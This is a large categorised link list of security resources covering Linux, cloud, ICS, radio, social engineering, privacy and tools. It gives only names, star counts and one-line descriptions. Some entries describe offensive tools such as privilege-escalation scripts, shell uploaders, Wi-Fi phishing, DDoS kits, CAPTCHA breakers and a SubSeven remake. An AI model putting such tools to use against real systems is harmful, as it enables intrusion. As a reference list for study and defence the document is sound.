| Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh | |||
| Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh | |||
| Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh | |||
CSIRT / Mobile / Linux/ *Nix | |||
| Dmesg under the hood | : Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show to the user | ||
| Randomize your MAC address using NetworkManager | |||
| Shadow-Box | 184 | over 5 years ago | : Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017) - and |
| Privilege Escalation | : pentestbook | ||
| A cache invalidation bug in Linux memory management | Project Zero: | ||
| Announcing flickerfree boot for Fedora 29 | |||
| The Linux Backdoor Attempt of 2003 | |||
| Análise de binários em Linux | (PT-BR) | ||
| GMER | : Rootkit Detector and Remover | ||
| suprotect | 46 | about 6 years ago | : Changing memory protection in an arbitrary process |
| A look at home routers, and a surprising bug in Linux/MIPS | |||
| Hacking Tricks | (pt-br) : Escalação de Privilégio em Linux com Capability | ||
| Basic Linux Privilege Escalation | : It's just a basic & rough guide | ||
| Linux process infection (part I) | :Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence | ||
| tpotce | 6,855 | 8 days ago | : T-Pot Universal Installer and ISO Creator |
| Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials | : LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform | ||
| Linuxprivchecker.py | 1,569 | almost 3 years ago | : A Linux Privilege Escalation Check Script |
| Linux Kernel exploitation Tutorial. | 262 | over 4 years ago | |
| ebpf_exporter | 2,200 | 21 days ago | : Prometheus exporter for custom eBPF metrics |
| Zydra | 421 | 12 months ago | : is a file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords |
| A gentle introduction to Linux Kernel fuzzing | - | ||
| Teardown of a Failed Linux LTS Spectre Fix | : Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels | ||
| Ropstar | 317 | over 1 year ago | : Automatic exploit generation for simple linux pwn challenges |
| Ken Thompson's Unix password | |||
| Exploiting Wi-Fi Stack on Tesla Model S | |||
| dlinject.py | 775 | over 2 years ago | : Inject a shared library (i.e. arbitrary code) into a live linux process, without ptrace |
| (Ab)using Kerberos from Linux | |||
| LKRG | 415 | about 1 month ago | : Linux Kernel Runtime Guard |
| Privilege Escalation via Python Library Hijacking | |||
| Logging Passwords on Linux | |||
| Kicksecure ™ | : A Security-hardened, Non-anonymous Linux Distribution | ||
| Setuid Demystified | |||
| ProcDump-for-Linux | 2,951 | 7 days ago | : A Linux version of the ProcDump Sysinternals tool |
| OPNsense GUI, API and systems backend | 3,363 | 4 days ago | |
| static-binaries | 3,183 | over 1 year ago | : Various *nix tools built as statically-linked binaries |
| Traitor | 6,689 | 8 months ago | : Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins ⬆️ ☠️ |
| traitor | 6,689 | 8 months ago | |
| ProcMon-for-Linux | 4,039 | 7 days ago | : is a Linux reimagining of the classic Procmon tool from the Sysinternals suite of tools for Windows. Procmon provides a convenient and efficient way for Linux developers to trace the syscall activity on the system |
| OSWatcher | 58 | about 1 year ago | : A framework to track the evolution of Operating Systems over time |
| Producing a trustworthy x86-based Linux appliance | |||
| Running a quick NMAP scan to inventory my network | |||
| Packet Strider | 253 | almost 4 years ago | : A network packet forensics tool for SSH |
| telfhash | 102 | almost 3 years ago | (Trend Micro ELF Hash): Symbol hash for ELF files |
| 64-bit Linux stack smashing tutorial: Part 1 | |||
| Hardening ELF binaries using Relocation Read-Only (RELRO) | |||
| Linux Threat Report 2021 1H | |||
| Learning Linux Kernel Exploitation - Part 1 | |||
| Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn | |||
| So You Wanna Pwn The Kernel? | |||
| SMB “Access is denied” caused by anti-NTLM relay protection | |||
CSIRT / Mobile / Cloud | |||
| Scout Suite | 6,751 | 3 days ago | : Multi-Cloud Security Auditing Tool |
| Cloud Security Research | 356 | over 4 years ago | : Cloud-related research releases from the Rhino Security Labs team |
| gVisor | 15,851 | 6 days ago | : is an application kernel, written in Go, that implements a substantial portion of the Linux system surface |
| PARSEC | 471 | 3 months ago | : Platform AbstRaction for SECurity service |
| Cloud Security Alliance | : The Cloud Security Alliance (CSA) is the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment | ||
| CIS Controls Cloud Companion Guide | |||
| CloudFail | 2,237 | 8 months ago | : Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network |
| HatCloud | 514 | over 1 year ago | (discontinued) |
| Uncovering bad guys hiding behind CloudFlare | |||
| CloudFlair | 2,618 | 5 months ago | : Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys |
| thsosrtl | 52 | over 10 years ago | : Repo for tools - cloud and vpn. : was originally thought of for attempting to resolve the true IP address of targets running through cloudflare |
| Malicious Shell Script Steals Cloud Credentials | |||
| badPods | 599 | over 2 years ago | : A collection of manifests that will create pods with elevated privileges |
| carbon-black-cloud-sdk-python | 40 | 7 days ago | VMware Carbon Black Cloud Python SDK |
| Baserunner | 205 | about 2 years ago | : A tool for exploring Firebase datastores |
| A SOC Tried To Detect Threats in the Cloud … You Won’t Believe What Happened Next | |||
| Cloud Native Computing Foundation | The (CNCF) hosts critical components of the global technology infrastructure | ||
| Checkov | 7,149 | about 16 hours ago | is a static code analysis tool for infrastructure-as-code |
| KICS | 2,099 | 1 day ago | stands for Keeping Infrastructure as Code Secure, it is open source and is a must-have for any cloud native project. finds security vulnerabilities, compliance issues, and infrastructure misconfigurations in following Infrastructure as Code solutions: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible. 1900+ queries are available |
| 10 real-world stories of how we’ve compromised CI/CD pipelines | |||
| GitHub Action Runners | , Analyzing the Environment and Security in Action | ||
CSIRT / Mobile / GCP/Google | |||
| gcp dhcp takeover code exec | 533 | over 3 years ago | : Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent |
| New research: How effective is basic account hygiene at preventing hijacking | |||
CSIRT / Mobile / Azure | |||
| SimuLand | 703 | over 1 year ago | : Understand adversary tradecraft and improve detection strategies |
| Azure-Readiness-Checklist | 495 | almost 2 years ago | : This checklist is your guide to the best practices for deploying secure, scalable, and highly available infrastructure in Azure. Before you go live, go through each item, and make sure you haven't missed anything important! |
| Preventing Exposed Azure Blob Storage | |||
| Open Azure blobs search on grayhatwarfare.com and other updates | |||
| ChaosDB | : is an unprecedented critical vulnerability in the Azure cloud platform that allows for remote account takeover of Azure’s flagship database - Cosmos DB | ||
| Introducing Project Freta | : Toward trusted sensing for the cloud | ||
| Finding Azurescape | : Cross-Account Container Takeover in Azure Container Instances | ||
| Malicious KQL Query | Azure Monitor: | ||
CSIRT / Mobile / AWS | |||
| git-secrets | 12,442 | 7 months ago | : Prevents you from committing secrets and credentials into git repositories |
| CloudMapper | 6,006 | 4 months ago | : CloudMapper helps you analyze your Amazon Web Services (AWS) environments |
| Security Monkey | 4,357 | almost 4 years ago | : Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time |
| my-arsenal-of-aws-security-tools | 8,983 | 25 days ago | : List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc |
| RKMS | 43 | almost 6 years ago | : RKMS is a highly available key management service, built on top of AWS's KMS |
| FireProx | 1,925 | over 1 year ago | : AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation |
| AWS IAM privileges as found using the AWS Policy Generator described at | |||
| Sadcloud | 659 | about 1 year ago | : A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure |
| Endgame | : Creating | ||
| Bucky | 190 | almost 3 years ago | : An automatic S3 bucket discovery tool |
| Prowler | 10,867 | about 4 hours ago | : Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness |
| barq | 386 | about 2 years ago | : The AWS Cloud Post Exploitation framework! |
| Text → AWS IAM Policy | : Describe your ideal AWS IAM Policy in plain text and will use GPT-3 from Open AI to generate an AWS IAM policy | ||
CSIRT / Risk Assessment and Vulnerability Management | |||
| Gerenciamento de Risco Cibernético | (PT-BR) | ||
| RITA (Real Intelligence Threat Analytics) | 2,509 | 4 months ago | |
| Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash | by grugq | ||
| ISO27001 audit in real-time.... | |||
| Gearing Towards Your Next Audit | : Understanding the Difference Between Best Practice Frameworks and Regulatory Compliance Standards | ||
| Nuclei | 20,687 | 7 days ago | is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. : Community curated list of templates for the nuclei engine to find a security vulnerability in application |
CSIRT / Risk Assessment and Vulnerability Management / Nuclei | |||
| Nuclei unleashed - writing first exploit | |||
CSIRT / Risk Assessment and Vulnerability Management | |||
| Secure design principles | |||
| Risk Assessment of GitHub Copilot | |||
| ISA/IEC 62443 | |||
| Understanding IEC 62443 | |||
| NERC CIP | |||
| Threat Modeling Manifesto | |||
| hcltm | 401 | 3 months ago | : Documenting your Threat Models with HCL |
| Risk Management Framework for Systems and Organizations Introductory Course | |||
CSIRT / Risk Assessment and Vulnerability Management / Guidelines | |||
| NIST Special Publication 800-63B: Digital Identity Guidelines | |||
| Easy Ways to Build a Better P@$5w0rd | |||
| Time for Password Expiration to Die | |||
| Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events | |||
CSIRT / ICS (SCADA) | |||
| GRASSMARLIN | 941 | over 4 years ago | : Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments |
| ATT&CK® for Industrial Control Systems | |||
| THE RACE TO NATIVE CODE EXECUTION IN PLCS | |||
| The Top 20 Secure PLC Coding Practices Project | |||
CSIRT / ICS (SCADA) / Synchrophasor | |||
| IEEE C37.118.1-2011 - IEEE Standard for Synchrophasor Measurements for Power Systems | |||
| Measuring relays and protection equipment - Part 118-1: Synchrophasor for power systems - Measurements | |||
| IEEE C37.118 protocol | |||
| IEEE C37.118 Synchrophasor Protocol | wireshark wiki | ||
CSIRT / ICS (SCADA) | |||
| INFRA:HALT | : Forescout Research Labs and JFrog Security Research discover 14 new vulnerabilities affecting closed source TCP/IP stack NicheStack, allowing for Denial of Service or Remote Code Execution primarily affecting operational technology (OT) and industrial control system (ICS) devices | ||
| Findings From Examining More Than a Decade of Public ICS/OT Exploits | |||
| The Top 20 Secure PLC Coding Practices Project | |||
| Conpot | 1,243 | 9 months ago | : ICS/SCADA honeypot |
| Hello_Proto | 9 | over 3 years ago | : "Banner Grabbing" en entornos industriales |
CSIRT / Radio | |||
| Qualcomm chain-of-trust | |||
| Presenting QCSuper | : a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones | ||
| Logitech keyboards and mice vulnerable to extensive cyber attacks | |||
| A look at GSM | |||
| The gr-gsm project | 1,346 | 11 months ago | : Gnuradio blocks and tools for receiving GSM transmissions |
| srsLTE | 3,484 | 5 months ago | : Open source SDR LTE software suite from Software Radio Systems (SRS) |
| List of software-defined radios | |||
| Spectrum Analyzers, Linux | |||
CSIRT / Radio / Spectrum Analyzers, Linux | |||
| Sonic Visualiser | : | ||
| spek | |||
| SpectMorph | : is a free software project which allows to analyze samples of musical instruments, and to combine them (morphing) | ||
CSIRT / Radio | |||
| The LibreCellular project | aims to make it easier to create 4G cellular networks with open source software and low cost software-defined radio (SDR) hardware | ||
| RFSec-ToolKit | 1,565 | 6 months ago | is a collection of Radio Frequency Communication Protocol Hacktools |
CSIRT / Radio / Satellite | |||
| How Do I Crack Satellite and Cable Pay TV? (33c3) | |||
CSIRT / Radio / Satellite / How Do I Crack Satellite and Cable Pay TV? (33c3) | |||
| Capture data from QPSK-demodulated OOB bitstream with Saleae logic analyzer and output byte stream. | 19 | over 8 years ago | |
| Process QPSK-demodulated data into transport stream (SCTE 55-1) | 21 | over 8 years ago | |
CSIRT / Social Engineering | |||
| Cartero | 171 | over 4 years ago | : Social Engineering Framework |
| The Basics of Social Engineering | by Chris Pritchard on DEF CON 27. Books suggested: | ||
CSIRT / Social Engineering / The Basics of Social Engineering | |||
| Never Split Difference | Chris Voss | ||
| The Carisma Myth | Olivia Fox Cabane | ||
| Hacking the Human | Ian Mann | ||
| Chris Hadnagy | The Art Of Social Engineering - | ||
| Joe Navarro | What Everybody is Saying - | ||
CSIRT / Social Engineering | |||
| The Social-Engineer Toolkit (SET) | 11,000 | about 1 month ago | : repository from TrustedSec - All new versions of SET will be deployed here |
CSIRT / Tools | |||
| Network Security Monitoring on Raspberry Pi type devices | 779 | almost 7 years ago | |
| A secure, shared workspace for secrets | 614 | almost 6 years ago | |
| bettercap | 16,771 | 6 days ago | , the Swiss army knife for network attacks and monitoring |
| Quijote | 47 | almost 4 years ago | is an highly configurable HTTP middleware for API security |
| Tool Analysis Result Sheet | 345 | almost 7 years ago | and , via by jpcertcc |
| EKOLABS | 51 | about 2 years ago | tools repo |
| Vapor PwnedPasswords Provider | : Package for testing a password against Pwned Passwords V2 API in Vapor | ||
| Is my password pwned? | 151 | almost 4 years ago | , |
| XPoCe | XPC Snooping utilties for MacOS and iOS (version 2.0) | ||
| Enterprise Password Quality Checking | 158 | almost 2 years ago | using any hash data sources (HaveIBeenPwned lists, et al) |
| DockerAttack | 278 | over 6 years ago | : Various Tools and Docker Images |
| PyREBox | 1,654 | 9 months ago | is a Python scriptable Reverse Engineering sandbox |
| find3 | 4,653 | almost 2 years ago | : High-precision indoor positioning framework, version 3 |
| structured-text-tools | 6,981 | 3 months ago | : A list of command line tools for manipulating structured text data |
| telnetlogger | 238 | over 7 years ago | : Simulates enough of a Telnet connection in order to log failed login attempts |
| vault | 31,217 | 7 days ago | : A tool for secrets management, encryption as a service, and privileged access management |
| WeakNet LINUX 8 | : This is an information-security themed distribution that has been in development since 2010 | ||
| HiTB | : It was a part of HackTheBox platform | ||
| arphid | 34 | over 6 years ago | : DYI 125KHz RFID read/write/emulate guide |
| Pybelt | 511 | over 6 years ago | : The hackers tool belt |
| mhax | 30 | over 6 years ago | |
| U2F Support Firefox Extension | 197 | about 7 years ago | |
| git-bug | 8,148 | 11 days ago | : Distributed bug tracker embedded in Git |
| mkcert | 50,197 | 3 months ago | : A simple zero-config tool to make locally trusted development certificates with any names you'd like |
| trackerjacker | 2,636 | 10 months ago | : Like nmap for mapping wifi networks you're not connected to, plus device tracking |
| Polymorph | 461 | 10 months ago | is a real-time network packet manipulation framework with support for almost all existing protocols |
| query_huawei_wifi_router | 13 | over 3 years ago | : A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc |
| kravatte | 15 | almost 6 years ago | : Implementation of Kravatte Encryption Suite |
| noisy | 1,691 | 12 months ago | : Simple random DNS, HTTP/S internet traffic noise generator |
| PatternAnalyzer | 12 | over 4 years ago | : The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use |
| Google Chromium | 20,774 | 8 days ago | , sans integration with Google |
| Gammux | 54 | over 5 years ago | : A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images |
| openvotenetwork | : Implementation of anonymous in go | ||
| put2win | 125 | over 4 years ago | : Script to automatize shell upload by PUT HTTP method to get meterpreter |
| Tools by Morphus Labs | |||
| Stratosphere IPS | |||
| Convert nmap Scans into Beautiful HTML Pages | |||
| NMapGUI | 468 | over 4 years ago | : Advanced Graphical User Interface for NMap |
| GeoInt | |||
| python-nubia | 1,591 | over 2 years ago | : A command-line and interactive shell framework |
| nipe | 1,954 | 3 months ago | : is a script to make Tor Network your default gateway |
| fuxploider | 3,050 | over 1 year ago | : File upload vulnerability scanner and exploitation tool |
| solo | 2,310 | about 2 years ago | : FIDO2 USB+NFC token optimized for security, extensibility, and style |
| Joint Report On Publicly Available Hacking Tools | : by Canadian Centre for Cyber Security | ||
| APTSimulator | 2,470 | over 1 year ago | : A toolset to make a system look as if it was the victim of an APT attack |
| debugger-netwalker | 7 | about 7 years ago | : NetWalker Debugger |
| USB armory | 1,372 | 24 days ago | : |
| Bashfuscator | 1,660 | about 1 year ago | : A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team |
| Big List of Naughty Strings | 46,208 | 7 months ago | |
| Netflix Cloud Security SIRT releases Diffy | : A Differencing Engine for Digital Forensics in the Cloud - | ||
| Command-Line Snippets | : A place to share useful, one-line commands that make your life easier | ||
| IP-to-ASN - Team Cymru | |||
| 4nonimizer | 620 | almost 3 years ago | : A bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN) |
| free Entropy Service | |||
| Correct Horse Battery Staple | : Secure password generator to help keep you safer online | ||
| CorrectHorse | 2 | about 8 years ago | : random secure password generator |
| XKCD-password-generator | 1,325 | 5 months ago | : Generate secure multiword passwords/passphrases, inspired by XKCD |
| Using a Hardened Container Image for Secure Applications in the Cloud | |||
| freedomfighting | 403 | over 1 year ago | : A collection of scripts which may come in handy during your freedom fighting activities |
| Machine Learning and Security | 1,979 | about 2 years ago | : Source code about machine learning and security |
| octofairy | 14 | almost 6 years ago | : A machine learning based GitHub bot for Issues |
| kbd-audio | 8,545 | almost 2 years ago | : Tools for capturing and analysing keyboard input paired with microphone capture |
| certstreamcatcher | 81 | almost 6 years ago | : This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks |
| Wifiphisher | 13,314 | 11 months ago | : is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing |
| chezmoi | 13,411 | 5 days ago | : Manage your dotfiles securely across multiple machines |
| hexyl | 9,166 | 24 days ago | : A command-line hex viewer |
| Giggity | 126 | over 1 year ago | : Wraps github api for openly available information about an organization, user, or repo |
| howmanypeoplearearound | 6,919 | 3 months ago | : Count the number of people around you by monitoring wifi signals |
| LASCAR | 376 | about 1 year ago | : Ledger's Advanced Side-Channel Analysis Repository |
| Hostintel | : A Modular Python Application To Collect Intelligence For Malicious Hosts - | ||
| DarkNet_ChineseTrading | 1,067 | over 1 year ago | |
| mXtract | 582 | about 3 years ago | : Memory Extractor & Analyzer |
| commando-vm | 6,960 | about 2 months ago | : a fully customized, Windows-based security distribution for penetration testing and red teaming |
CSIRT / Tools / commando-vm | |||
| commando packages | 6,960 | about 2 months ago | |
CSIRT / Tools | |||
| Introducing Inkdrop 4 | |||
| AntiCheat-Testing-Framework | 791 | over 2 years ago | : Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal) |
| how we uncovered an attack on government entities in Europe | IronPython, darkly: | ||
| inlets | : Expose your local endpoints to the Internet | ||
| papers | 5 | 2 months ago | Papers released by the Intelstorm Team |
| Pwnagotchi | 7,750 | 3 months ago | : (⌐■_■) - Deep Reinforcement Learning vs WiFI |
| spyse.py | 269 | over 4 years ago | : Python API wrapper and command-line client for the tools hosted on spyse.com |
| Cloning a MAC address to bypass a captive portal | |||
| Open Steno Project | was founded by stenographer Mirabai Knight as a reaction to the closed down, proprietary nature of the court reporting industry | ||
| Machine Learning on Encrypted Data Without Decrypting It | |||
| 0bin | 1,378 | over 3 years ago | : Client side encrypted pastebin |
| Raspberry pi as poor man’s hardware hacking tool | |||
| usbkill | 4,442 | 9 months ago | : is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer |
| gs-transfer | 24 | over 3 years ago | : Secure File Transfer via Global Socket Bounce Network |
| CORE | 683 | about 2 months ago | : The Common Open Research Emulator (CORE) is a tool for emulating networks on one or more machines |
| VoightKampff | : Beating Google ReCaptcha and the funCaptcha using AWS Rekognition | ||
| John the Ripper in the cloud | : John the Ripper jumbo supports hundreds of hash and cipher types | ||
| SpamCop | is the premier service for reporting spam | ||
| vector-edk | 132 | over 9 years ago | : EFI Development Kit |
| H1R0GH057 | 1,838 | over 1 year ago | : tools (DDoS, lulz, etc..) |
| gatekeeper | 1,341 | about 2 months ago | : First open-source DDoS protection system |
| uriDeep | 95 | almost 3 years ago | : Unicode encoding attacks with machine learning |
| Rawsec's CyberSecurity Inventory | : | ||
| gaijin tools | |||
| Lord Of The Strings (LOTS) | 9 | over 4 years ago | : String extraction and classification tool for binary files, designed to extract only the strings that can be considered relevant (i.e. not garbage or false positives) |
| Unit 42 Public Tools Repo | 709 | about 2 years ago | : Listing of tools released by Palo Alto Networks Threat Intelligence team |
| glsnip | 109 | almost 3 years ago | : copy and paste across machines |
| CERTrating | is the first tool to assess the Maturity Level of CERTs and their services. News: | ||
| Cybersecurity Maturity Model Certification (CMMC) | |||
| What is the Cybersecurity Maturity Model Certification (CMMC) | |||
| Who needs to have Cybersecurity Maturity Model Certification (CMMC) | |||
| Security Tools | : Most of the links listed here goes to the original sites | ||
| Find Virtual Hosts for Any IP Address | |||
| ngrok | 24,183 | 7 months ago | : Introspected tunnels to localhost |
| cppngrok | 8 | over 3 years ago | : a cpp wrapper for ngrok (WIP) |
| Pybull | 31 | over 2 years ago | : Contains some cool python projects. It is 100% python coded. Have fun see_no_evil |
| dfss | 5 | about 8 years ago | : Daemon for sense of security. Shutdown or reboot your computer, like a " " |
| Gamifying machine learning for stronger security and AI models | : : An experimentation and research platform to investigate the interaction of automated agents in an abstract simulated network environments | ||
| BashScan | : is a port scanner built to utilize /dev/tcp for network and service discovery on systems that have limitations or are otherwise unable to use alternative scanning solutions such as nmap | ||
| python-libnessus | 25 | almost 2 years ago | : Python Nessus Library - libnessus is a python library to enable devs to chat with nessus XMLRPC API, parse, store and diff scan results. It's wonderful |
| NFIQ2 | 132 | about 2 months ago | : Biometric fingerprint image quality assessment tool |
| Beta | 245 | about 1 year ago | : Beta versions of Didier Stevens's software |
| MaxMind ASN Importer | 3 | over 1 year ago | : This is a script to import MaxMind ASN data into Tags (Host Groups) within Stealthwatch Enterprise, allowing for more granular tuning and identification of network flows |
| SubSeven is Back | : The legendary SubSeven returns with a fan-made version that delivers a retro remote control experience with no loss of functionality and no external dependencies required | ||
| Detect It Easy | 7,631 | 5 days ago | : Program for determining types of files for Windows, Linux and MacOS |
| Ronin | is a free and Open Source Ruby toolkit for security research and development. Ronin contains many different CLI commands and Ruby libraries for a variety of security tasks, such as encoding/decoding data, filter IPs/hosts/URLs, querying ASNs, querying DNS, HTTP, scanning for web vulnerabilities, spidering websites, install 3rd party repositories of exploits and/or payloads, run exploits, write new exploits, managing local databases, fuzzing data, and much more | ||
CSIRT / Tools / Note-taking | |||
| Awesome note-taking apps for hackers ! | 347 | almost 4 years ago | |
| SwiftnessX | 889 | almost 2 years ago | : A cross-platform note-taking & target-tracking app for penetration testers |
| cherrytree | : A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file | ||
| cherrytree | : A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file | ||
| SwiftnessX | 889 | almost 2 years ago | : A cross-platform note-taking & target-tracking app for penetration testers |
| https://github.com/zadam/trilium | 27,370 | 4 months ago | [trilium] ): Build your personal knowledge base with Trilium Notes |
| obsidian | : is a powerful knowledge base that works on top of a local folder of plain text Markdown files | ||
| CudaText | , | ||
| marktext | 47,398 | 3 months ago | : A simple and elegant markdown editor, available for Linux, macOS and Windows |
| helix | 33,775 | 9 days ago | : A post-modern modal text editor |
| Compare AsciiDoc and Markdown | |||
CSIRT / Tools / Kali | |||
| hurl | 72 | about 7 years ago | : hexadecimal & URL encoder + decoder. : hURL is a small utility that can encode and decode between multiple formats |
| Kali Tools | |||
CSIRT / Tools / IP Reputation | |||
| IP Reputation Check | |||
| IP & Domain Reputation Center | |||
CSIRT / Tools / Shell tools | |||
| Python-Scripts | 172 | 10 days ago | : some scripts for penetration testing |
| SubEnum | 329 | about 1 year ago | : bash script for Subdomain Enumeration |
| password-store | : Simple password manager using gpg and ordinary unix directories | ||
CSIRT / Tools / Search Engines | |||
| DarkSearch | : | ||
| Search engines for Hackers | : | ||
CSIRT / Tools / Search Engines / Search engines for Hackers | |||
| censys.io | |||
| shodan.io | |||
CSIRT / Tools / Search Engines / Search engines for Hackers / shodan.io | |||
| TriOp | : Tool for quickly gathering statistical information from Shodan.io | ||
CSIRT / Tools / Search Engines / Search engines for Hackers | |||
| viz.greynoise.io | |||
| zoomeye.org | |||
| wigle.net | |||
| publicwww.com | |||
| hunter.io | |||
| haveibeenpwned.com | |||
| haveibeenEMOTET | |||
| thispersondoesnotexist.com | |||
| osintframework.com | |||
| NAPALM FTP Indexer | lets you search and download files located on public FTP servers. The most advanced FTP Search Engine service maintained by members | ||
CSIRT / Tools / Search Engines | |||
| Insecam | : Network live IP video cameras directory | ||
CSIRT / Tools / VPN | |||
| jigsaw project | by Alphabet/Google. : VPN Server | ||
| SSHuttle | 11,787 | 22 days ago | : Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling |
| WireGuard | : is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache | ||
| Crockford’s base 32 encoding | : Crockford’s base 32 encoding is a compromise between efficiency and human legibility | ||
| Sputnik | -An Open Source Intelligence Browser Extension | ||
| PCredz | 2,013 | about 2 months ago | : This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface |
| uncaptcha2 | 4,959 | almost 6 years ago | : defeating the latest version of ReCaptcha with 91% accuracy |
| Nefarious LinkedIn | 824 | almost 6 years ago | : A look at how LinkedIn spies on its users |
| ProtonVPN-CLI | : Linux command-line client for ProtonVPN. Written in Python | ||
| Nebula | 14,583 | 7 days ago | : A scalable overlay networking tool with a focus on performance, simplicity and security |
| AirVPN | A VPN based on OpenVPN and operated by activists and hacktivists in defence of net neutrality, privacy and against censorship | ||
| Build your own private WireGuard VPN with PiVPN | |||
CSIRT / Tools / Secure Sharing | |||
| CryFS | : Keep your data safe in the cloud | ||
| Cryptomator | : Multi-platform transparent client-side encryption of your files in the cloud | ||
| VeraCrypt | : is a free open source disk encryption software for Windows, Mac OSX and Linux | ||
| CipherShed | : is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs) | ||
| Boxcryptor | : Security for your Cloud | ||
| Nextcloud E2E | 31 | 15 days ago | : End-to-end encryption RFC. Some old news |
| DiskCryptor | is an open encryption solution that offers encryption of all disk partitions, including the system partition | ||
| ProjectSend | 1,411 | about 2 months ago | is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more! |
| send | 13,263 | over 3 years ago | Mozilla : Simple, private file sharing from the makers of Firefox (archived). Revival: |
CSIRT / Privacy | |||
| Device and Data Access when Personal Safety is At Risk | Apple: | ||
| Everything Old is New Part 2: Why Online Anonymity Matters | |||
| Data Security on Mobile Devices | : Current State of the Art, Open Problems, and Proposed Solutions | ||
| Breach alert: on Apr 7th -based fintech IUGU exposed its entire database, incl. ALL customers and account details: emails, phones, addresses, invoices etc. IP with 1.7TB indexed by Shodan, I immediately alerted the company, db was taken down within an hour. No response. | |||
| TorBox Wireless Manager | |||
| Anyone can use this powerful facial-recognition tool — and that's a problem | |||
| The Instagram ads Facebook won't show you | |||
| Yggdrasil | 3,649 | 5 days ago | : An experiment in scalable routing as an encrypted IPv6 overlay network |
| Receiving sensitive information about any Dodo pizzeria | 24 | over 3 years ago | |
| 4TB of stolen identities are being circulated online following a breach on Oriflame | |||
| Using “Master Faces” to Bypass Face-Recognition Authenticating Systems | , , two | ||
| apollo | 1,372 | about 1 year ago | : A Unix-style personal search engine and web crawler for your digital footprint |
| Forensic Methodology Report: How to catch NSO Group’s Pegasus | |||
| Who is being monitored? | : Politicians regularly claim that they need to ban encryption to protect the children. But who is actually being monitored? | ||
| How to choose a browser for everyday use? | , and | ||
| TrackerControl | 31 | over 1 year ago | : monitor and control trackers and ads |
| Disinformation guru “Hacker X” names his employer: NaturalNews.com | |||
| Hey Siri, Find My Ex | : Tech-Enabled Abuse in the Apple Ecosystem | ||
| Keyhole Imaging | |||
| Your Roomba May Be Mapping Your Home, Collecting Data That Could Be Shared | |||
| Global Presence of Authoritarian Tech | |||
| Zooming in on Zero-click Exploits | |||
CSIRT / General | |||
| Explain Shell | |||
| Examples of regular expressions | |||
| A tcpdump Tutorial and Primer with Examples | |||
| Capture WiFi / WLAN / 802.11 Probe Request with tcpdump | |||
| A curated list of awesome Threat Intelligence resources | 8,127 | 3 months ago | |
| Looking for value in EV Certificates | |||
| How to find hidden cameras | |||
| the Simple Encrypted Arithmetic Library (SEAL) | 225 | over 5 years ago | : This repository is a fork of Microsoft Research's homomorphic encryption implementation |
| Cupcake | 408 | about 1 year ago | : A Rust library for lattice-based additive homomorphic encryption |
| Our latest updates on Fully Homomorphic Encryption | |||
| A port of ChibiOS to the Orchard radio platform | 11 | about 9 years ago | |
| Decent Security | : Everyone can be secure | ||
| Introducing Certificate Transparency and Nimbus | |||
| trillian | 3,553 | 7 days ago | : Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees |
| CFSSL's CA trust store repository | 258 | 18 days ago | |
